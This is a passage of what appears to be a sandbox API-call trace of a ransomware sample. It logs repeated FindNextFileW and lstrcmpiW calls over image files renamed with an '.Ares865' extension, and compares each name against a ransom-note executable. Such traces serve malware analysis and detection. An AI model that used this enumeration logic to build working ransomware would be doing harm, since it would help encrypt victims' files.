ftLastAccessTime.dwLowDateTime=0x6a1fd500, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a033720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x5990, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBOmar[1].jpg.Ares865", cAlternateFileName="BBBOMA~1.ARE")) returned 1 [0110.880] lstrcmpiW (lpString1="BBBOmar[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.880] lstrcmpiW (lpString1="BBBOmar[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.880] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBOmar[1].jpg.Ares865" | out: lpString1="BBBOmar[1].jpg.Ares865") returned="BBBOmar[1].jpg.Ares865" [0110.880] lstrlenW (lpString="BBBOmar[1].jpg.Ares865") returned 22 [0110.880] lstrlenW (lpString="Ares865") returned 7 [0110.880] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.880] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52f7f1f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52f7f1f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a059880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3270, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBR4yQ[1].jpg.Ares865", cAlternateFileName="BBBR4Y~1.ARE")) returned 1 [0110.880] lstrcmpiW (lpString1="BBBR4yQ[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.880] lstrcmpiW (lpString1="BBBR4yQ[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.881] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBR4yQ[1].jpg.Ares865" | out: lpString1="BBBR4yQ[1].jpg.Ares865") returned="BBBR4yQ[1].jpg.Ares865" [0110.881] lstrlenW (lpString="BBBR4yQ[1].jpg.Ares865") returned 22 [0110.881] lstrlenW (lpString="Ares865") returned 7 [0110.881] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.881] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52e4e6f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52e4e6f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a059880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2950, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBUPaj[1].jpg.Ares865", cAlternateFileName="BBBUPA~1.ARE")) returned 1 [0110.881] lstrcmpiW (lpString1="BBBUPaj[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.881] lstrcmpiW (lpString1="BBBUPaj[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.881] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBUPaj[1].jpg.Ares865" | out: lpString1="BBBUPaj[1].jpg.Ares865") returned="BBBUPaj[1].jpg.Ares865" [0110.881] lstrlenW (lpString="BBBUPaj[1].jpg.Ares865") returned 22 [0110.881] lstrlenW (lpString="Ares865") returned 7 [0110.881] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.881] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5e275160, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5e275160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a059880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x4110, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBVEOW[1].jpg.Ares865", cAlternateFileName="BBBVEO~1.ARE")) returned 1 [0110.881] lstrcmpiW (lpString1="BBBVEOW[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.881] lstrcmpiW (lpString1="BBBVEOW[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.881] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBVEOW[1].jpg.Ares865" | out: lpString1="BBBVEOW[1].jpg.Ares865") returned="BBBVEOW[1].jpg.Ares865" [0110.881] lstrlenW (lpString="BBBVEOW[1].jpg.Ares865") returned 22 [0110.881] lstrlenW (lpString="Ares865") returned 7 [0110.881] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.881] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52f32f30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52f32f30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a07f9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xd20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBVLcG[1].jpg.Ares865", cAlternateFileName="BBBVLC~1.ARE")) returned 1 [0110.881] lstrcmpiW (lpString1="BBBVLcG[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.881] lstrcmpiW (lpString1="BBBVLcG[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.882] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBVLcG[1].jpg.Ares865" | out: lpString1="BBBVLcG[1].jpg.Ares865") returned="BBBVLcG[1].jpg.Ares865" [0110.882] lstrlenW (lpString="BBBVLcG[1].jpg.Ares865") returned 22 [0110.882] lstrlenW (lpString="Ares865") returned 7 [0110.882] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.882] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x530afcf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x530afcf0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a07f9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBVSkP[1].jpg.Ares865", cAlternateFileName="BBBVSK~1.ARE")) returned 1 [0110.882] lstrcmpiW (lpString1="BBBVSkP[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.882] lstrcmpiW (lpString1="BBBVSkP[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.882] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBVSkP[1].jpg.Ares865" | out: lpString1="BBBVSkP[1].jpg.Ares865") returned="BBBVSkP[1].jpg.Ares865" [0110.882] lstrlenW (lpString="BBBVSkP[1].jpg.Ares865") returned 22 [0110.882] lstrlenW (lpString="Ares865") returned 7 [0110.882] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.882] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x612a8ee0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x612a8ee0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a0a5b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBYfEH[1].jpg.Ares865", cAlternateFileName="BBBYFE~1.ARE")) returned 1 [0110.882] lstrcmpiW (lpString1="BBBYfEH[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.882] lstrcmpiW (lpString1="BBBYfEH[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.882] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBYfEH[1].jpg.Ares865" | out: lpString1="BBBYfEH[1].jpg.Ares865") returned="BBBYfEH[1].jpg.Ares865" [0110.882] lstrlenW (lpString="BBBYfEH[1].jpg.Ares865") returned 22 [0110.882] lstrlenW (lpString="Ares865") returned 7 [0110.882] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.882] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53017770, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53017770, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a0a5b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xf20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBBZ5vT[1].jpg.Ares865", cAlternateFileName="BBBZ5V~1.ARE")) returned 1 [0110.882] lstrcmpiW (lpString1="BBBZ5vT[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.882] lstrcmpiW (lpString1="BBBZ5vT[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.882] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBBZ5vT[1].jpg.Ares865" | out: lpString1="BBBZ5vT[1].jpg.Ares865") returned="BBBZ5vT[1].jpg.Ares865" [0110.883] lstrlenW (lpString="BBBZ5vT[1].jpg.Ares865") returned 22 [0110.883] lstrlenW (lpString="Ares865") returned 7 [0110.883] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.883] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x514ddbd0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x514ddbd0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a0a5b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC02Gr[1].jpg.Ares865", cAlternateFileName="BBC02G~1.ARE")) returned 1 [0110.883] lstrcmpiW (lpString1="BBC02Gr[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.883] lstrcmpiW (lpString1="BBC02Gr[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.883] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC02Gr[1].jpg.Ares865" | out: lpString1="BBC02Gr[1].jpg.Ares865") returned="BBC02Gr[1].jpg.Ares865" [0110.883] lstrlenW (lpString="BBC02Gr[1].jpg.Ares865") returned 22 [0110.883] lstrlenW (lpString="Ares865") returned 7 [0110.883] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.883] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5392ab50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5392ab50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a0a5b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC02Gr[2].jpg.Ares865", cAlternateFileName="BBC02G~2.ARE")) returned 1 [0110.883] lstrcmpiW (lpString1="BBC02Gr[2].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.883] lstrcmpiW (lpString1="BBC02Gr[2].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.883] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC02Gr[2].jpg.Ares865" | out: lpString1="BBC02Gr[2].jpg.Ares865") returned="BBC02Gr[2].jpg.Ares865" [0110.883] lstrlenW (lpString="BBC02Gr[2].jpg.Ares865") returned 22 [0110.883] lstrlenW (lpString="Ares865") returned 7 [0110.883] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.883] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52fa5350, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52fa5350, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a0cbca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xba0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC03B1[1].jpg.Ares865", cAlternateFileName="BBC03B~1.ARE")) returned 1 [0110.883] lstrcmpiW (lpString1="BBC03B1[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.883] lstrcmpiW (lpString1="BBC03B1[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.883] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC03B1[1].jpg.Ares865" | out: lpString1="BBC03B1[1].jpg.Ares865") returned="BBC03B1[1].jpg.Ares865" [0110.884] lstrlenW (lpString="BBC03B1[1].jpg.Ares865") returned 22 [0110.884] lstrlenW (lpString="Ares865") returned 7 [0110.884] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.884] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52f0cdd0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52f0cdd0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a0cbca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xac0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC06Ub[1].jpg.Ares865", cAlternateFileName="BBC06U~1.ARE")) returned 1 [0110.884] lstrcmpiW (lpString1="BBC06Ub[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.884] lstrcmpiW (lpString1="BBC06Ub[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.884] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC06Ub[1].jpg.Ares865" | out: lpString1="BBC06Ub[1].jpg.Ares865") returned="BBC06Ub[1].jpg.Ares865" [0110.884] lstrlenW (lpString="BBC06Ub[1].jpg.Ares865") returned 22 [0110.884] lstrlenW (lpString="Ares865") returned 7 [0110.884] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.884] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52e74850, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52e74850, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a0cbca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xcb0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC0Djg[1].jpg.Ares865", cAlternateFileName="BBC0DJ~1.ARE")) returned 1 [0110.884] lstrcmpiW (lpString1="BBC0Djg[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.884] lstrcmpiW (lpString1="BBC0Djg[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.884] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC0Djg[1].jpg.Ares865" | out: lpString1="BBC0Djg[1].jpg.Ares865") returned="BBC0Djg[1].jpg.Ares865" [0110.884] lstrlenW (lpString="BBC0Djg[1].jpg.Ares865") returned 22 [0110.884] lstrlenW (lpString="Ares865") returned 7 [0110.884] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.884] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52ec0b10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52ec0b10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a0f1e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC0g7a[1].jpg.Ares865", cAlternateFileName="BBC0G7~1.ARE")) returned 1 [0110.884] lstrcmpiW (lpString1="BBC0g7a[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.884] lstrcmpiW (lpString1="BBC0g7a[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.884] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC0g7a[1].jpg.Ares865" | out: lpString1="BBC0g7a[1].jpg.Ares865") returned="BBC0g7a[1].jpg.Ares865" [0110.885] lstrlenW (lpString="BBC0g7a[1].jpg.Ares865") returned 22 [0110.885] lstrlenW (lpString="Ares865") returned 7 [0110.885] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.885] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52fcb4b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52fcb4b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a0f1e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC0lf2[1].jpg.Ares865", cAlternateFileName="BBC0LF~1.ARE")) returned 1 [0110.885] lstrcmpiW (lpString1="BBC0lf2[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.885] lstrcmpiW (lpString1="BBC0lf2[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.885] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC0lf2[1].jpg.Ares865" | out: lpString1="BBC0lf2[1].jpg.Ares865") returned="BBC0lf2[1].jpg.Ares865" [0110.885] lstrlenW (lpString="BBC0lf2[1].jpg.Ares865") returned 22 [0110.885] lstrlenW (lpString="Ares865") returned 7 [0110.885] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.885] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5b2e35a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5b2e35a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a0f1e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC0mK1[1].jpg.Ares865", cAlternateFileName="BBC0MK~1.ARE")) returned 1 [0110.885] lstrcmpiW (lpString1="BBC0mK1[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.885] lstrcmpiW (lpString1="BBC0mK1[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.885] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC0mK1[1].jpg.Ares865" | out: lpString1="BBC0mK1[1].jpg.Ares865") returned="BBC0mK1[1].jpg.Ares865" [0110.885] lstrlenW (lpString="BBC0mK1[1].jpg.Ares865") returned 22 [0110.885] lstrlenW (lpString="Ares865") returned 7 [0110.885] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.885] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53089b90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53089b90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6a0f1e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x22d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBC0qlB[1].jpg.Ares865", cAlternateFileName="BBC0QL~1.ARE")) returned 1 [0110.885] lstrcmpiW (lpString1="BBC0qlB[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.885] lstrcmpiW (lpString1="BBC0qlB[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.885] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBC0qlB[1].jpg.Ares865" | out: lpString1="BBC0qlB[1].jpg.Ares865") returned="BBC0qlB[1].jpg.Ares865" [0110.885] lstrlenW (lpString="BBC0qlB[1].jpg.Ares865") returned 22 [0110.886] lstrlenW (lpString="Ares865") returned 7 [0110.886] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.886] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x458308d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x458308d0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a117f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x31d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBE7KPZ[1].jpg.Ares865", cAlternateFileName="BBE7KP~1.ARE")) returned 1 [0110.886] lstrcmpiW (lpString1="BBE7KPZ[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.886] lstrcmpiW (lpString1="BBE7KPZ[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.886] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBE7KPZ[1].jpg.Ares865" | out: lpString1="BBE7KPZ[1].jpg.Ares865") returned="BBE7KPZ[1].jpg.Ares865" [0110.886] lstrlenW (lpString="BBE7KPZ[1].jpg.Ares865") returned 22 [0110.886] lstrlenW (lpString="Ares865") returned 7 [0110.886] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.886] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45a6bd70, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45a6bd70, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a117f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xcd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBE8IlA[1].jpg.Ares865", cAlternateFileName="BBE8IL~1.ARE")) returned 1 [0110.886] lstrcmpiW (lpString1="BBE8IlA[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.886] lstrcmpiW (lpString1="BBE8IlA[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.886] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBE8IlA[1].jpg.Ares865" | out: lpString1="BBE8IlA[1].jpg.Ares865") returned="BBE8IlA[1].jpg.Ares865" [0110.886] lstrlenW (lpString="BBE8IlA[1].jpg.Ares865") returned 22 [0110.886] lstrlenW (lpString="Ares865") returned 7 [0110.886] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.886] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45b9c870, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x45b9c870, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a13e0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2970, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBE972F[1].jpg.Ares865", cAlternateFileName="BBE972~1.ARE")) returned 1 [0110.886] lstrcmpiW (lpString1="BBE972F[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.886] lstrcmpiW (lpString1="BBE972F[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.886] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBE972F[1].jpg.Ares865" | out: lpString1="BBE972F[1].jpg.Ares865") returned="BBE972F[1].jpg.Ares865" [0110.886] lstrlenW (lpString="BBE972F[1].jpg.Ares865") returned 22 [0110.887] lstrlenW (lpString="Ares865") returned 7 [0110.887] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.887] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x458308d0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x458308d0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a13e0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x2d80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBE9tdx[1].jpg.Ares865", cAlternateFileName="BBE9TD~1.ARE")) returned 1 [0110.887] lstrcmpiW (lpString1="BBE9tdx[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.887] lstrcmpiW (lpString1="BBE9tdx[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.887] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBE9tdx[1].jpg.Ares865" | out: lpString1="BBE9tdx[1].jpg.Ares865") returned="BBE9tdx[1].jpg.Ares865" [0110.887] lstrlenW (lpString="BBE9tdx[1].jpg.Ares865") returned 22 [0110.887] lstrlenW (lpString="Ares865") returned 7 [0110.887] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0110.887] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x458a2cf0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x458a2cf0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x6a13e0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x32f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BBEdrqt[1].jpg.Ares865", cAlternateFileName="BBEDRQ~1.ARE")) returned 1 [0110.887] lstrcmpiW (lpString1="BBEdrqt[1].jpg.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0110.887] lstrcmpiW (lpString1="BBEdrqt[1].jpg.Ares865", lpString2="aoldtz.exe") returned 1 [0110.887] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="BBEdrqt[1].jpg.Ares865" | out: lpString1="BBEdrqt[1].jpg.Ares865") returned="BBEdrqt[1].jpg.Ares865" [0110.887] lstrlenW (lpString="BBEdrqt[1].jpg.Ares865") returned 22 [0110.887] lstrlenW (lpString="Ares865") returned 7 [0110.887] lstrcmpiW (lpString1="Ares865", 